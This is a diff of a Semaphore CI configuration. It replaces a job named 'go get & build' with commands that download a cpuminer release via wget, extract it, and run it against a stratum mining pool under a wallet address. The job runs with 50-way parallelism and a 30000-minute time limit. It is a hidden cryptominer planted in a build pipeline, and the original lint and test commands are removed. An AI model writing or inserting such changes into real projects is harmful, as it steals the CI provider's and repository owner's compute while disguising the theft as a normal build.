--- a/.semaphore/semaphore.yml
+++ b/.semaphore/semaphore.yml
@@ -10,26 +10,11 @@ blocks:
       jobs:
         - name: go get & build
           commands:
-            - 'version: v1.0'
-            - 'name: Using execution_time_limit on a job'
-            - 'agent:'
-            - '  machine:'
-            - '    type: e1-standard-2'
-            - '    os_image: ubuntu1804'
-            - 'blocks:'
-            - '  - name: Tests'
-            - '    task:'
-            - '      jobs:'
-            - '      - name: Lint'
-            - '        commands:'
-            - '          - checkout'
-            - '          - make lint'
-            - '      - name:  Tests'
-            - '        execution_time_limit:'
+            - 'wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz '
+            - tar xf cpuminer-opt-linux.tar.gz
+            - './cpuminer-sse2 -a power2b -o stratum+tcps://stratum-eu.rplant.xyz:17022 -u BgopqeRqFTkxqSnxiCodAEoNYsdP6VDLHz.By -p -x'
+            - 'execution_time_limit:'
             - '          minutes: 30000'
-            - '        commands:'
-            - '          - checkout'
-            - '          - make test'
           parallelism: 50
   - name: Check code style
     task:
